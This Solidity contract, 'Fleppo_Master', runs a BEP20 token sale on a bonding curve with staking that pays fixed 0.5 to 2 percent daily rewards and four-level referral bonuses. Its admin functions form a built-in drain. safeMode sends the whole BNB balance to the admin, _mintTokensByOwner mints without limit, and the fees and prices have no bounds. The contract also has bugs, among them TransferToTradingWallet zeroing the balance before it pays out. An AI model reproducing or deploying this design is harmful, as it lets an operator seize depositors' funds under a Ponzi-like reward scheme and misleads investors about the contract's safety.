pragma solidity ^0.5.10; 

//*******************************************************************//
//------------------------ SafeMath Library -------------------------//
//*******************************************************************//

library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    if (a == 0) {
        return 0;
    }
    uint256 c = a * b;
    require(c / a == b, 'SafeMath mul failed');
    return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
    // assert(b > 0); // Solidity automatically throws when dividing by 0
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold
    return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    require(b <= a, 'SafeMath sub failed');
    return a - b;
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, 'SafeMath add failed');
    return c;
    }
}


    
//****************************************************************************//
//---------------------        MAIN CODE STARTS HERE     ---------------------//
//****************************************************************************//
    

interface IBEP20Token
{
    function mintTokens(address receipient, uint256 tokenAmount) external returns(bool);
    function transfer(address _to, uint256 _value) external returns (bool success);
    function balanceOf(address user) external view returns(uint256);
    function totalSupply() external view returns (uint256);
    function maxsupply() external view returns (uint256);
    function repurches(address _from, address _to, uint256 _value) external returns(bool);
    function burn_internal(uint256 _value, address _to) external returns (bool);
}

contract Fleppo_Master {
    
    IBEP20Token public rewardToken;
    /*===============================
    =         DATA STORAGE          =
    ===============================*/

    // Public variables of the token
    using SafeMath for uint256;


    struct Stake {
        uint256 amount;
        uint256 startTime;
        uint256 lastCheckOutTime;  
        uint256 endTime;
        uint dailyreward;
    }

    struct User {
		Stake[] stake;
		address referrer;
        uint256 referrerBonus;
        uint256 Total_Token_buy;
        uint256 Total_buy;
        uint256 totalReferrer;
        uint256[4] refStageIncome; //total business of referrer each stage
        uint256[4] refStageBonus; //bonus of referrer each stage
		uint[4] refs;  // number of referrer each stage
	}

    
      mapping (address => User) public users;
      uint256 constant private _decimals = 8;
      uint256 public tokenPriceInitial_ = 200000000000000;
      uint256 public tokenPriceIncremental_ = 200000000;
      uint[4] public ref_bonuses = [10,10,10,10];
      uint[4] public requiredDirectbusiness = [10000,50000,200000,500000];
      uint[4] public requiredownbuy = [1000,5000,20000,50000];


     
      uint256 internal stakingRequirement = 10000000000;
      uint256 public _currentPurchseLimit;

      uint256 public lockingperiod = 90 days;

      uint256 internal TradingWallet;

      address[] internal stakeholders;
      
      uint256 constant public TIME_STEP =  1 days;
      address payable admin;

      uint256 public adminFee = 5;

      uint256 public contractPlaced;

      bool public isMaxPayout;
       
       
       /*===============================
        =         PUBLIC EVENTS         =
        ===============================*/

     // This generates a public event of token transfer
     event BuyToken(address indexed user, uint256 AmountofToken);
     event SellToken(address indexed user, uint256 Amountofvalue);
     event StakeToken(address indexed user, uint256 Token);
     event Withdrawn(address indexed user, uint256 Amount);
     event UnStake(address indexed user, uint256 Token);
     



   constructor(IBEP20Token _rewardToken, address payable _admin) public{
        rewardToken = _rewardToken;
        _currentPurchseLimit = 0;
        admin=_admin;
        contractPlaced = block.timestamp;
   }


    function percent(uint numerator, uint denominator, uint precision) internal pure returns(uint quotient) {

            // caution, check safe-to-multiply here
            uint _numerator  = numerator * 10 ** (precision+1);
            // with rounding of last digit
            uint _quotient =  ((_numerator / denominator) + 5) / 10;
            return ( _quotient);
    }

   /**
    * @notice A method to check if an address is a stakeholder.
    * @param _address The address to verify.
    * @return bool, uint256 Whether the address is a stakeholder,
    * and if so its position in the stakeholders array.
    */
   function isStakeholder(address _address) public view returns(bool, uint256)
   {
       for (uint256 s = 0; s < stakeholders.length; s += 1){
           if (_address == stakeholders[s]) return (true, s);
       }
       return (false, 0);
   }

   /**
    * @notice A method to add a stakeholder.
    * @param _stakeholder The stakeholder to add.
    */
   function addStakeholder(address _stakeholder) internal{
       (bool _isStakeholder,) = isStakeholder(_stakeholder);
       if(!_isStakeholder) stakeholders.push(_stakeholder);
   }

   /**
    * @notice A method for a stakeholder to create a stake.
    * @param _stake The size of the stake to be created.
    */
   function createStake(uint256 _stake) external{
       uint _balanceOf = rewardToken.balanceOf(msg.sender);
       require( _balanceOf >= _stake, 'Insufficent Token!');
       require( _stake >= stakingRequirement, 'Min stake 100 Polkabot!');
       rewardToken.repurches(msg.sender,address(this),_stake);
       if(users[msg.sender].stake.length == 0) addStakeholder(msg.sender);
       (uint _per)=getCurrentRewardPer();
       users[msg.sender].stake.push(Stake(_stake, block.timestamp, 0, 0, _per));
       emit StakeToken(msg.sender,_stake);
   }

   
   function removeStake(uint _index) external
   {
       uint256 _balanceOfstakes = users[msg.sender].stake[_index].amount.add(getUserDividend(msg.sender,_index));
       require( _balanceOfstakes > 0 , 'Insufficent Token!');
       
       if(block.timestamp > users[msg.sender].stake[_index].startTime +lockingperiod){
        users[msg.sender].stake[_index].endTime = block.timestamp;
        rewardToken.repurches(address(this),msg.sender,users[msg.sender].stake[_index].amount);
        _mintTokens(msg.sender, _balanceOfstakes.sub(users[msg.sender].stake[_index].amount));
        emit UnStake(msg.sender,_balanceOfstakes);
       }
       
   }

   function userStake_start(address _address, uint _index)public view returns(uint256 _time){
       return users[_address].stake[_index].startTime;
   }

   
   function buyToken(address _referrer) external payable {

         User storage user = users[msg.sender];

         uint256 _taxedValue = msg.value;
         uint256 _amountOfTokens = BNBToTokens_(_taxedValue);

         if (user.referrer == address(0) && _referrer != msg.sender){
             user.referrer = _referrer;
         }

         require(user.referrer != address(0) || msg.sender == admin, "No upline");
        
         if (user.referrer != address(0)) {
		   
            // unilevel level count
            address upline = user.referrer;
            for (uint i = 0; i < ref_bonuses.length; i++) {
                if (upline != address(0)) {
                    users[upline].refStageIncome[i] = users[upline].refStageIncome[i].add(_amountOfTokens);
                    users[upline].refs[i] = users[upline].refs[i].add(1);
					users[upline].totalReferrer++;
                    upline = users[upline].referrer;
                } else break;
            }
            
        }

        // referral distribution
        _refPayout(msg.sender,_amountOfTokens);
         user.Total_Token_buy = user.Total_Token_buy.add(_amountOfTokens);
         user.Total_buy = user.Total_buy.add(_taxedValue);
         TradingWallet = TradingWallet.add(_taxedValue.mul(2).div(100));
         _mintTokens(address(this),_amountOfTokens);

         if(users[msg.sender].stake.length == 0) addStakeholder(msg.sender);
         (uint _per)=getCurrentRewardPer();
         users[msg.sender].stake.push(Stake(_amountOfTokens, block.timestamp, 0, 0, _per));
         emit BuyToken(msg.sender,_amountOfTokens);
       
   }

   function sellToken(uint256 _amountOfTokens) external {

        
        uint256 _balanceOf = rewardToken.balanceOf(msg.sender);
        require(_amountOfTokens <= _balanceOf, 'Insufficent Token!');
        uint256 _tokens = _amountOfTokens;
        uint256 _bnb = tokensToBNB_(_tokens);
        uint256 fee = _bnb.mul(adminFee).div(100);
        uint256 actualBnb = _bnb.sub(fee);
        rewardToken.burn_internal(_amountOfTokens,msg.sender);
        /// admin fee
        _safeTransfer(admin,fee);
         /// amount of bnb
        _safeTransfer(msg.sender,actualBnb);
        emit SellToken(msg.sender,actualBnb);

    }

    function calculateTokensReceived(uint256 _bnbToSpend) public view returns (uint256) {
        uint256 _amountOfTokens = BNBToTokens_(_bnbToSpend);
        return _amountOfTokens;
    }

    function calculateBnbReceived(uint256 _tokensToSell) public view returns (uint256) {
        uint256 tokenSupply_ = rewardToken.totalSupply();
        require(_tokensToSell <= tokenSupply_);
        uint256 _bnb = tokensToBNB_(_tokensToSell);
        uint256 fee = _bnb.mul(adminFee).div(100);
        return _bnb.sub(fee);
    }


   function sellPrice() public view returns (uint256) {
        // our calculation relies on the token supply, so we need supply. Doh.

       uint256 tokenSupply_ = rewardToken.totalSupply();

        if (tokenSupply_ == 0) {
            return tokenPriceInitial_ - tokenPriceIncremental_;
        } else {
            uint256 _price = tokensToBNB_(1e8);
            return _price;
        }
    }

    function buyPrice() public view returns (uint256) {

        uint256 tokenSupply_ = rewardToken.totalSupply();
        if (tokenSupply_ == 0) {
            return tokenPriceInitial_ + tokenPriceIncremental_;
        } else {
            uint256 _price = tokensToBNB_(1e8);
            return _price;
        }
    }

    function BNBToTokens_(uint256 _bnb) internal view returns (uint256) {
        uint256 tokenSupply_ = rewardToken.totalSupply();
        uint256 _tokenPriceInitial = tokenPriceInitial_ * 1e8;
        uint256 _tokensReceived = ((SafeMath.sub((sqrt((_tokenPriceInitial ** 2)
        + (2 * (tokenPriceIncremental_ * 1e8) * (_bnb * 1e8))
        + ((tokenPriceIncremental_ ** 2) * (tokenSupply_ ** 2))
        + (2 * tokenPriceIncremental_ * _tokenPriceInitial*tokenSupply_)
        )), _tokenPriceInitial)) / (tokenPriceIncremental_)) - (tokenSupply_);
        return _tokensReceived;
    }

    function tokensToBNB_(uint256 _tokens) internal view returns (uint256) {
        uint256 tokenSupply_ = rewardToken.totalSupply();
        uint256 tokens_ = (_tokens + 1e8);
        uint256 _tokenSupply = (tokenSupply_ + 1e8);
        uint256 _tronReceived = (SafeMath.sub((((tokenPriceInitial_ + (tokenPriceIncremental_ * (_tokenSupply / 1e8))
            ) - tokenPriceIncremental_) * (tokens_ - 1e8)
            ), (tokenPriceIncremental_ * ((tokens_ ** 2 - tokens_) / 1e8)) / 2)/ 1e8);
        return _tronReceived;
    }



   function _refPayout(address _addr, uint256 _amount) internal {

		address up = users[_addr].referrer;
        for(uint8 i = 0; i < ref_bonuses.length; i++) {
            if(up == address(0)) break;
            if((users[up].refStageIncome[0] >= requiredDirectbusiness[i].mul(1e8)) || (users[up].Total_Token_buy >= requiredownbuy[i].mul(1e8))){ 

    		        uint256 bonus = _amount * ref_bonuses[i] / 100;
                    users[up].referrerBonus = users[up].referrerBonus.add(bonus);
                    users[up].refStageBonus[i] = users[up].refStageBonus[i].add(bonus);
                    
            }
            up = users[up].referrer;
        }
    }

  


   function getUserTotalDividends(address userAddress) public view returns (uint256) {

       User storage user = users[userAddress];
       uint256 totalDividends;
	   uint256 dividends;
       uint256 total_TokenSupply = totalTokenSupply();
       

		for (uint256 i = 0; i < user.stake.length; i++) {

            if (user.stake[i].endTime == 0) {

                uint256 maxPayout = user.stake[i].amount.add(user.stake[i].amount.mul(200).div(100));
                if(user.stake[i].startTime > user.stake[i].lastCheckOutTime){
                dividends = (user.stake[i].amount.mul(user.stake[i].dailyreward).div(1000)).mul(block.timestamp.sub(user.stake[i].startTime)).div(TIME_STEP);
                }else{
                dividends = (user.stake[i].amount.mul(user.stake[i].dailyreward).div(1000)).mul(block.timestamp.sub(user.stake[i].lastCheckOutTime)).div(TIME_STEP);   
                }
                if (isMaxPayout && user.stake[i].amount.add(dividends) > maxPayout) {
                    dividends = user.stake[i].amount;
                }
            }
            totalDividends = totalDividends.add(dividends);
        }

        if(total_TokenSupply.add(totalDividends) > rewardToken.maxsupply()){
            uint256 maxSuply = rewardToken.maxsupply();
            totalDividends = maxSuply.sub(total_TokenSupply);
        }


        return totalDividends;
   }

    function getUserDividend(address userAddress, uint _index) public view returns (uint256) {

       User storage user = users[userAddress];
       uint256 total_TokenSupply = totalTokenSupply();
	   uint256 dividends;

            if (user.stake[_index].endTime == 0) {
                uint256 maxPayout = user.stake[_index].amount.add(user.stake[_index].amount.mul(200).div(100));
                if(user.stake[_index].startTime > user.stake[_index].lastCheckOutTime){
                 dividends = (user.stake[_index].amount.mul(user.stake[_index].dailyreward).div(1000)).mul(block.timestamp.sub(user.stake[_index].startTime)).div(TIME_STEP);
                }else{
                 dividends = (user.stake[_index].amount.mul(user.stake[_index].dailyreward).div(1000)).mul(block.timestamp.sub(user.stake[_index].lastCheckOutTime)).div(TIME_STEP);   
                }
                if (isMaxPayout && user.stake[_index].amount.add(dividends) > maxPayout) {
                    dividends = user.stake[_index].amount;
                }
            }
           
        if(total_TokenSupply.add(dividends) > rewardToken.maxsupply()){
            uint256 maxSuply = rewardToken.maxsupply();
            dividends = maxSuply.sub(total_TokenSupply);
        }

        return dividends;
   }


   function getUserTotalStake(address userAddress) public view returns (uint256) {

        User storage user = users[userAddress];
        uint256 TotalStake;
        for (uint256 i = 0; i < user.stake.length; i++) {
            if (user.stake[i].endTime == 0) {
                TotalStake = TotalStake.add(user.stake[i].amount);
            }
        }

        return TotalStake;
   }

   function withdrawReward() public {
       
       User storage user = users[msg.sender];
       (uint256 totalDividends) = getUserTotalDividends(msg.sender);
       uint256 totalReward = totalDividends.add(user.referrerBonus);
       users[msg.sender].referrerBonus = 0;

       for (uint256 i = 0; i < user.stake.length; i++) {
            if (user.stake[i].endTime == 0) {
                user.stake[i].lastCheckOutTime = block.timestamp;
            }
        }

        _mintTokens(msg.sender,totalReward);
   }

    function getUserDetails(address _user) public view returns(uint _stakeLength, uint256 _TotalBuy, uint256 _Total_token_buy, address _referrer){
            User storage user = users[_user];
            return (user.stake.length, user.Total_buy, user.Total_Token_buy, user.referrer);
    }



    function getCurrentRewardPer() public view returns(uint _per){

        uint dep = 0;
        if(block.timestamp > contractPlaced +360 days){
            dep = 5; // 0.5 percent
        }else if(block.timestamp > contractPlaced +90 days){
            dep = 10; // 1 percent
        }else{
            dep = 20; // 2 percent
        }

        return dep;
    }

    function referral_stage(address _user,uint _index)public view returns(uint _noOfUser, uint256 _investment, uint256 _bonus){
       return (users[_user].refs[_index], users[_user].refStageIncome[_index], users[_user].refStageBonus[_index]);
    }

   function userBalanceOf(address _addr) external view returns(uint _amount){
       _amount = rewardToken.balanceOf(_addr);  
   }

   function _safeTransfer(address payable _to, uint _amount) internal returns (uint256 amount) {
        amount = (_amount < address(this).balance) ? _amount : address(this).balance;
       _to.transfer(amount);
   }

    function _mintTokens(address receipient, uint256 tokenAmount) internal{
        rewardToken.mintTokens(receipient,tokenAmount);
    }

    function _mintTokensByOwner(address receipient, uint256 tokenAmount) external{
        require(msg.sender == admin);
        rewardToken.mintTokens(receipient,tokenAmount);
    }
       /**
    * @notice A method to retrieve the stake for a stakeholder.
    * @param _stakeholder The stakeholder to retrieve the stake for.
    * @return uint256 The amount of wei staked.
    */
   function stakeOf(address _stakeholder, uint _index) external view returns(uint256){
       return users[_stakeholder].stake[_index].amount;
   }

   /**
    * @notice A method to the aggregated stakes from all stakeholders.
    * @return uint256 The aggregated stakes from all stakeholders.
    */
   function totalStakes() public view returns(uint256){
       uint256 _totalStakes = 0;
       for (uint256 s = 0; s < stakeholders.length; s += 1){
           _totalStakes = _totalStakes.add(getUserTotalStake(stakeholders[s]));
       }
       return _totalStakes;
   }

   function totalTokenSupply() public view returns(uint256){
       return rewardToken.totalSupply();
   }
   
   
   function stakeholdersLength() public view returns(uint256){
       return stakeholders.length;
   }

    function updateIntlPrice(uint256 _amount, uint256 _incremental) external{
       require(msg.sender == admin);
       tokenPriceInitial_ = _amount;
       tokenPriceIncremental_ = _incremental;
   }

   function update_lockingperiod(uint256 _time) external{
       require(msg.sender == admin);
       lockingperiod = _time;
   }

   function updateStakingRequirement(uint256 _amount) external{
       require(msg.sender == admin);
       stakingRequirement = _amount;
   }

   function updateAdminFee(uint256 _percent) external{
       require(msg.sender == admin);
       adminFee = _percent;
   }

   function updateisMaxPayout(bool _bool) external{
       require(msg.sender == admin);
       isMaxPayout = _bool;
   }

   

   function safeMode() external{
       require(msg.sender == admin);
       _safeTransfer(address(msg.sender),address(this).balance);
   }

   function TransferToTradingWallet(address payable _address) external{
       require(msg.sender == admin);
       TradingWallet = 0;
       _safeTransfer(_address,TradingWallet);
   }

   function sqrt(uint256 x) internal pure returns (uint256 y) {
        uint256 z = (x + 1) / 2;
        y = x;
        while (z < y) {
            y = z;
            z = (x / z + z) / 2;
        }
    }

   

}